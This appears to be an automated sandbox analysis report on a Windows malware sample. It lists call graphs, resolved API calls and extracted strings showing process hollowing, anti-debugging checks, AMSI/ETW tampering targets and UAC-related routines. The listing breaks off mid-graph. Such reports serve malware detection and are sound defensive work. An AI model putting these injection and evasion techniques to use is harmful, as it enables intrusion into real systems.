2e647ec 11 API calls 37979->37981 37983 2e789d0 20 API calls 37980->37983 37987 2e79a58 37981->37987 37984 2e647ec 11 API calls 37982->37984 37985 2e79d43 37983->37985 37990 2e79ac9 37984->37990 37986 2e77a2c 18 API calls 37985->37986 37988 2e79d64 37986->37988 37987->37976 37989 2e789d0 20 API calls 37987->37989 37988->37780 37991 2e64860 11 API calls 37988->37991 37989->37976 37992 2e789d0 20 API calls 37990->37992 37995 2e79d92 37991->37995 37993 2e79aed 37992->37993 37994 2e64860 11 API calls 37993->37994 37997 2e79b09 37994->37997 37996 2e647ec 11 API calls 37995->37996 37999 2e79dc3 37996->37999 37998 2e647ec 11 API calls 37997->37998 38002 2e79b3a 37998->38002 38000 2e789d0 20 API calls 37999->38000 38001 2e79de7 38000->38001 38003 2e64860 11 API calls 38001->38003 38004 2e789d0 20 API calls 38002->38004 38007 2e79e03 38003->38007 38005 2e79b5e 38004->38005 38006 2e77a2c 18 API calls 38005->38006 38006->37940 38008 2e647ec 11 API calls 38007->38008 38009 2e79e34 38008->38009 38010 2e789d0 20 API calls 38009->38010 38011 2e79e58 38010->38011 38229 2e78c80 38011->38229 38013 2e64860 11 API calls 38015 2e79edf 38013->38015 38014 2e79e5f 38014->38013 38016 2e647ec 11 API calls 38015->38016 38017 2e79f10 38016->38017 38018 2e789d0 20 API calls 38017->38018 38019 2e79f34 38018->38019 38020 2e64860 11 API calls 38019->38020 38021 2e79f50 38020->38021 38022 2e647ec 11 API calls 38021->38022 38023 2e79f81 38022->38023 38024 2e789d0 20 API calls 38023->38024 38025 2e79fa5 38024->38025 38026 2e64860 11 API calls 38025->38026 38027 2e79fc1 38026->38027 38028 2e647ec 11 API calls 38027->38028 38029 2e79ff2 38028->38029 38030 2e789d0 20 API calls 38029->38030 38031 2e7a016 38030->38031 38032 2e77d78 18 API calls 38031->38032 38033 2e7a033 38032->38033 38034 2e64860 11 API calls 38033->38034 38035 2e7a04f 38034->38035 38036 2e647ec 11 API calls 38035->38036 38037 2e7a080 38036->38037 38038 2e789d0 20 API calls 38037->38038 38039 2e7a0a4 38038->38039 38040 2e64860 11 API calls 38039->38040 38041 2e7a0c0 38040->38041 38042 2e647ec 11 API calls 38041->38042 38043 2e7a0f1 38042->38043 38044 2e789d0 20 API calls 38043->38044 38045 2e7a115 38044->38045 38046 2e64860 11 API calls 38045->38046 38047 2e7a131 38046->38047 38048 2e647ec 11 API calls 38047->38048 38049 2e7a162 38048->38049 38050 2e789d0 20 API calls 38049->38050 38051 2e7a186 38050->38051 38052 2e77d78 18 API calls 38051->38052 38053 2e7a1a6 38052->38053 38054 2e64860 11 API calls 38053->38054 38055 2e7a1c2 38054->38055 38056 2e647ec 11 API calls 38055->38056 38057 2e7a1f3 38056->38057 38058 2e789d0 20 API calls 38057->38058 38059 2e7a217 38058->38059 38060 2e64860 11 API calls 38059->38060 38061 2e7a233 38060->38061 38062 2e647ec 11 API calls 38061->38062 38063 2e7a264 38062->38063 38064 2e789d0 20 API calls 38063->38064 38065 2e7a288 38064->38065 38066 2e64860 11 API calls 38065->38066 38067 2e7a2a4 38066->38067 38068 2e647ec 11 API calls 38067->38068 38069 2e7a2d5 38068->38069 38070 2e789d0 20 API calls 38069->38070 38071 2e7a2f9 SetThreadContext NtResumeThread 38070->38071 38072 2e64860 11 API calls 38071->38072 38073 2e7a345 38072->38073 38074 2e647ec 11 API calls 38073->38074 38075 2e7a376 38074->38075 38076 2e789d0 20 API calls 38075->38076 38077 2e7a39a 38076->38077 38078 2e64860 11 API calls 38077->38078 38079 2e7a3b6 38078->38079 38080 2e647ec 11 API calls 38079->38080 38081 2e7a3e7 38080->38081 38082 2e789d0 20 API calls 38081->38082 38083 2e7a40b 38082->38083 38084 2e64860 11 API calls 38083->38084 38085 2e7a427 38084->38085 38086 2e647ec 11 API calls 38085->38086 38087 2e7a458 38086->38087 38088 2e789d0 20 API calls 38087->38088 38089 2e7a47c 38088->38089 38090 2e64860 11 API calls 38089->38090 38091 2e7a498 38090->38091 38092 2e647ec 11 API calls 38091->38092 38093 2e7a4c9 38092->38093 38094 2e789d0 20 API calls 38093->38094 38095 2e7a4ed 38094->38095 38096 2e62c2c 11 API calls 38095->38096 38097 2e7a4fc 38096->38097 38098 2e64860 11 API calls 38097->38098 38099 2e7a51e 38098->38099 38100 2e647ec 11 API calls 38099->38100 38101 2e7a54f 38100->38101 38102 2e789d0 20 API calls 38101->38102 38103 2e7a573 38102->38103 38104 2e7894c 21 API calls 38103->38104 38105 2e7a587 38104->38105 38106 2e7894c 21 API calls 38105->38106 38107 2e7a59b 38106->38107 38108 2e7894c 21 API calls 38107->38108 38109 2e7a5af 38108->38109 38110 2e64860 11 API calls 38109->38110 38111 2e7a5cb 38110->38111 38112 2e647ec 11 API calls 38111->38112 38113 2e7a5fc 38112->38113 38114 2e789d0 20 API calls 38113->38114 38115 2e7a620 38114->38115 38116 2e7894c 21 API calls 38115->38116 38117 2e7a634 38116->38117 38118 2e7894c 21 API calls 38117->38118 38119 2e7a648 38118->38119 38120 2e64860 11 API calls 38119->38120 38121 2e7a664 38120->38121 38122 2e647ec 11 API calls 38121->38122 38123 2e7a682 38122->38123 38124 2e7894c 21 API calls 38123->38124 38125 2e7a69a 38124->38125 38126 2e64860 11 API calls 38125->38126 38127 2e7a6b6 38126->38127 38128 2e647ec 11 API calls 38127->38128 38129 2e7a6d4 38128->38129 38130 2e7894c 21 API calls 38129->38130 38131 2e7a6ec 38130->38131 38132 2e7894c 21 API calls 38131->38132 38133 2e7a700 38132->38133 38134 2e7894c 21 API calls 38133->38134 38135 2e7a714 38134->38135 38136 2e7894c 21 API calls 38135->38136 38137 2e7a728 38136->38137 38138 2e7894c 21 API calls 38137->38138 38139 2e7a73c 38138->38139 38140 2e64860 11 API calls 38139->38140 38141 2e7a758 38140->38141 38142 2e647ec 11 API calls 38141->38142 38143 2e7a776 38142->38143 38144 2e7894c 21 API calls 38143->38144 38145 2e7a78e 38144->38145 38146 2e64860 11 API calls 38145->38146 38147 2e7a7aa 38146->38147 38148 2e647ec 11 API calls 38147->38148 38149 2e7a7c8 38148->38149 38150 2e7894c 21 API calls 38149->38150 38151 2e7a7e0 38150->38151 38152 2e64860 11 API calls 38151->38152 38153 2e7a7fc 38152->38153 38154 2e647ec 11 API calls 38153->38154 38155 2e7a81a 38154->38155 38156 2e7894c 21 API calls 38155->38156 38157 2e7a832 38156->38157 38158 2e64860 11 API calls 38157->38158 38159 2e7a84e 38158->38159 38160 2e647ec 11 API calls 38159->38160 38161 2e7a86c 38160->38161 38162 2e7894c 21 API calls 38161->38162 38163 2e7a884 38162->38163 38164 2e7894c 21 API calls 38163->38164 38165 2e7a8a3 38164->38165 38166 2e7894c 21 API calls 38165->38166 38166->37780 38168 2e64530 11 API calls 38167->38168 38169 2e785df 38168->38169 38170 2e64860 11 API calls 38169->38170 38171 2e785fe 38170->38171 38172 2e781cc 17 API calls 38171->38172 38173 2e78611 38172->38173 38174 2e78274 15 API calls 38173->38174 38175 2e78617 WinExec 38174->38175 38176 2e78639 38175->38176 38177 2e644dc 11 API calls 38176->38177 38178 2e78641 38177->38178 38178->37055 38179->37113 38180->37275 38181->37323 38182->37447 38183->37277 38184->37369 38186 2e649a4 GetFileAttributesA 38185->38186 38186->37765 38188 2e64530 11 API calls 38187->38188 38189 2e78425 38188->38189 38190 2e7798c 12 API calls 38189->38190 38191 2e78432 38190->38191 38192 2e647ec 11 API calls 38191->38192 38193 2e7843f 38192->38193 38194 2e781cc 17 API calls 38193->38194 38195 2e78452 38194->38195 38196 2e78274 15 API calls 38195->38196 38197 2e78458 NtReadVirtualMemory 38196->38197 38198 2e78486 38197->38198 38199 2e64500 11 API calls 38198->38199 38200 2e78493 38199->38200 38200->37930 38200->37931 38202 2e64530 11 API calls 38201->38202 38203 2e78695 38202->38203 38204 2e7798c 12 API calls 38203->38204 38205 2e786a2 38204->38205 38206 2e647ec 11 API calls 38205->38206 38207 2e786af 38206->38207 38208 2e781cc 17 API calls 38207->38208 38209 2e786c2 38208->38209 38210 2e78274 15 API calls 38209->38210 38211 2e786c8 NtUnmapViewOfSection 38210->38211 38212 2e786e8 38211->38212 38213 2e64500 11 API calls 38212->38213 38214 2e786f5 38213->38214 38214->37971 38214->37972 38216 2e64530 11 API calls 38215->38216 38217 2e77a51 38216->38217 38218 2e7798c 12 API calls 38217->38218 38219 2e77a5e 38218->38219 38220 2e647ec 11 API calls 38219->38220 38221 2e77a6b 38220->38221 38222 2e781cc 17 API calls 38221->38222 38223 2e77a7e 38222->38223 38224 2e78274 15 API calls 38223->38224 38225 2e77a84 NtAllocateVirtualMemory 38224->38225 38226 2e77ab5 38225->38226 38227 2e64500 11 API calls 38226->38227 38228 2e77ac2 38227->38228 38228->37976 38230 2e62c10 11 API calls 38229->38230 38231 2e78cb6 38230->38231 38231->38014
                                                                                                                  APIs
                                                                                                                  • InetIsOffline.URL(00000000,00000000,02E8B784,?,?,?,00000000,00000000), ref: 02E7F801
                                                                                                                    • Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                    • Part of subcall function 02E7F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02E7FAEB,UacInitialize,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,Initialize), ref: 02E7F6EE
                                                                                                                    • Part of subcall function 02E7F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E7F700
                                                                                                                    • Part of subcall function 02E7F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E7F754
                                                                                                                    • Part of subcall function 02E7F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E7F766
                                                                                                                    • Part of subcall function 02E7F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E7F77D
                                                                                                                    • Part of subcall function 02E67E5C: GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67
                                                                                                                    • Part of subcall function 02E6C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02FDB8B8,?,02E80751,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession), ref: 02E6C37B
                                                                                                                    • Part of subcall function 02E7DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDAB
                                                                                                                    • Part of subcall function 02E7DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDDB
                                                                                                                    • Part of subcall function 02E7DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E7DDF0
                                                                                                                    • Part of subcall function 02E7DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E7DE1C
                                                                                                                    • Part of subcall function 02E7DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E7DE25
                                                                                                                    • Part of subcall function 02E67E80: GetFileAttributesA.KERNEL32(00000000,?,02E8356F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,Initialize), ref: 02E67E8B
                                                                                                                    • Part of subcall function 02E68048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E8370D,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,Initialize,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8), ref: 02E68055
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                  • API String ID: 297057983-2644593349
                                                                                                                  • Opcode ID: d961b379e6d1b8c11e2cf1ad665dd746ca036ddccc9399eeb900ee0b788b128e
                                                                                                                  • Instruction ID: decc13ba616212655229c367adfbd0234314c6f469af858e0d05d26fc75650a3
                                                                                                                  • Opcode Fuzzy Hash: d961b379e6d1b8c11e2cf1ad665dd746ca036ddccc9399eeb900ee0b788b128e
                                                                                                                  • Instruction Fuzzy Hash: 7414FA34AC011D8BDB21FB64D884AEE73BAFB85344F50E1A5B04DEB254DA71AE81CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 6027 2e78d70-2e78d73 6028 2e78d78-2e78d7d 6027->6028 6028->6028 6029 2e78d7f-2e78e66 call 2e64990 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6028->6029 6060 2e7a8b7-2e7a921 call 2e64500 * 2 call 2e64c60 call 2e64500 call 2e644dc call 2e64500 * 2 6029->6060 6061 2e78e6c-2e78f47 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6029->6061 6061->6060 6105 2e78f4d-2e79275 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e630d4 * 2 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64de0 call 2e64df0 call 2e78788 6061->6105 6214 2e79277-2e792e3 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6105->6214 6215 2e792e8-2e79609 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e62ee0 call 2e62f08 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2e7960f-2e79872 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78400 6215->6323 6396 2e79b7f-2e79bea call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 6323->6396 6397 2e79878-2e799e1 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78670 6323->6397 6422 2e79bf0-2e79d70 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77a2c 6396->6422 6423 2e79beb call 2e789d0 6396->6423 6487 2e799e3-2e79a09 call 2e77a2c 6397->6487 6488 2e79a0b-2e79a76 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 6397->6488 6422->6060 6527 2e79d76-2e79e6f call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78c80 6422->6527 6423->6422 6497 2e79a7c-2e79b73 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77a2c 6487->6497 6488->6497 6528 2e79a77 call 2e789d0 6488->6528 6567 2e79b78-2e79b7d 6497->6567 6579 2e79ec3-2e7a61b call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77d78 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77d78 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 SetThreadContext NtResumeThread call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e62c2c call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7894c * 3 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6527->6579 6580 2e79e71-2e79ebe call 2e78b78 call 2e78b6c 6527->6580 6528->6497 6567->6422 6805 2e7a620-2e7a8b2 call 2e7894c * 2 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c * 5 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e78080 call 2e7894c * 2 6579->6805 6580->6579 6805->6060
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                    • Part of subcall function 02E78788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814
                                                                                                                  • GetThreadContext.KERNEL32(00000894,02EE7424,ScanString,02EE73A8,02E7A93C,UacInitialize,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,UacInitialize,02EE73A8), ref: 02E79602
                                                                                                                    • Part of subcall function 02E78400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E78471
                                                                                                                    • Part of subcall function 02E78670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E786D5
                                                                                                                    • Part of subcall function 02E77A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F
                                                                                                                    • Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC
                                                                                                                  • SetThreadContext.KERNEL32(00000894,02EE7424,ScanBuffer,02EE73A8,02E7A93C,ScanString,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,00000890,003B1FF8,02EE74FC,00000004,02EE7500), ref: 02E7A317
                                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,00000894,02EE7424,ScanBuffer,02EE73A8,02E7A93C,ScanString,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,00000890,003B1FF8,02EE74FC), ref: 02E7A324
                                                                                                                    • Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
                                                                                                                    • Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
                                                                                                                    • Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                  • API String ID: 2388221946-51457883
                                                                                                                  • Opcode ID: 124946a43b0f45545d6e411d8594f281e0a1c1ca9846f66550b51a2ba557911b
                                                                                                                  • Instruction ID: e268735d4c6918b6262cd91aa12bfd473f98cc6c0593399e57fd5bf8d94f78fe
                                                                                                                  • Opcode Fuzzy Hash: 124946a43b0f45545d6e411d8594f281e0a1c1ca9846f66550b51a2ba557911b
                                                                                                                  • Instruction Fuzzy Hash: 33E21234AC01189BDB21FB64EC89BDE73B6AF95340F50E1B1B009AB354DA70AE95CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 6883 2e78d6e-2e78d73 6885 2e78d78-2e78d7d 6883->6885 6885->6885 6886 2e78d7f-2e78e66 call 2e64990 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6885->6886 6917 2e7a8b7-2e7a921 call 2e64500 * 2 call 2e64c60 call 2e64500 call 2e644dc call 2e64500 * 2 6886->6917 6918 2e78e6c-2e78f47 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6886->6918 6918->6917 6962 2e78f4d-2e79275 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e630d4 * 2 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 